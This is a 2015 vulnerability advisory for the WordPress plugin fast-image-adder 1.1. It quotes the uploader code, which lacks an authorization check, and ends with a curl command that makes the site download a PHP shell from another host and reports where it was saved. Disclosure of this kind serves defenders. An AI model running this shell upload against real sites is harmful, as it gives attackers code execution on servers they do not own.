WordPress Fast Image Adder 1.1 Shell Upload

`Title: Remote file upload vulnerability in fast-image-adder v1.1 Wordpress plugin  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-07-10  
Download Site: https://wordpress.org/plugins/fast-image-adder  
Vendor: https://profiles.wordpress.org/robbyslaughter/  
Vendor Notified: 2015-07-10  
Vendor Contact: [email protected]  
Description: Add images to your blog posts from a URL in a flash. Skip the download/upload steps and the slow WordPress dialog box.  
Vulnerability:  
The fast-image-adder-uploader.php file doesn't check if a user is authorized to upload files: It creates a random file name, but reports the name back to the user.  
  
60 $upload_dir = wp_upload_dir();  
61 $path = $upload_dir['path'];  
62 $new_filename = $suggested_name_filesystem . "_" . random_filename() . substr($url,strrpos($url,"."));  
63   
64   
65 // If we are not in test mode, get the file and resize it   
66 if ($test_mode === FALSE)  
67 {  
68 $image_data = file_get_contents($url);  
69 file_put_contents($path . "/" . $new_filename,$image_data);  
70 resize($path . "/" . $new_filename, $new_height, $new_width, $val_maxwidth, $path . "/" . $new_filename);  
71 }   
72   
73 $new_url = $upload_dir['url'] . "/" . $new_filename;  
.  
.  
  
83 if ($test_mode === FALSE)  
84 {  
85 echo "Uploaded as " . $new_url;  
86 }  
  
CVEID:  
OSVDB:  
Exploit Code:  
• $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php  
• Shell location is reported back to the user with random filename. The url site must not interpret php, but allow it for download.  
`